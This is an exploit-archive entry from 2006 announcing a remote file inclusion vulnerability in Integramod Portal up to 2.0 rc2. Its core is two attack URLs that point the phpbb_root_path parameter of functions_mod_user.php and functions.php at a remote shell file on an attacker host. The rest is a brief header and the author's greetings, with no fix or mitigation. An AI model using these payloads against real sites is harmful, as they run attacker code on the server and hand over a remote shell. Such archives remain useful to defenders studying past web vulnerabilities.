id: 745
date: 08/24/2006
title: Integramod Portal <= 2.0 rc2 (phpbb_root_path) Remote File Include
author: MATASANOS
cves: 

==================================================================
Integramod Portal <= 2.0 rc2 (phpbb_root_path) Remote File Include
==================================================================


##################################### matasanos ###################################
# Integramod Portal 2.x File Inclusion Vulnerabilities
#
#   affected software: Integramod Portal
#   vendor: Integramod . you can donwload it from http://www.integramod.com
#   level: Highly Critical (muy critico)
# 
#
#################################################################################### 
#
#
#   http://[target]/[patch]/includes/functions_mod_user.php?phpbb_root_path=http://url--ataca.org/shell.txt?
#
#   http://[target]/[patch]/includes/functions.php?phpbb_root_path=http://url--ataca.org/shell.txt?
#
#
####################################################################################
#
#                                 found by MATASANOS                               #
#
#
#
#         recuerdos a antrax,freak,piker,vampi,pennismen,hombre-cola,groxo         #



#  0day.today [2023-03-22]  #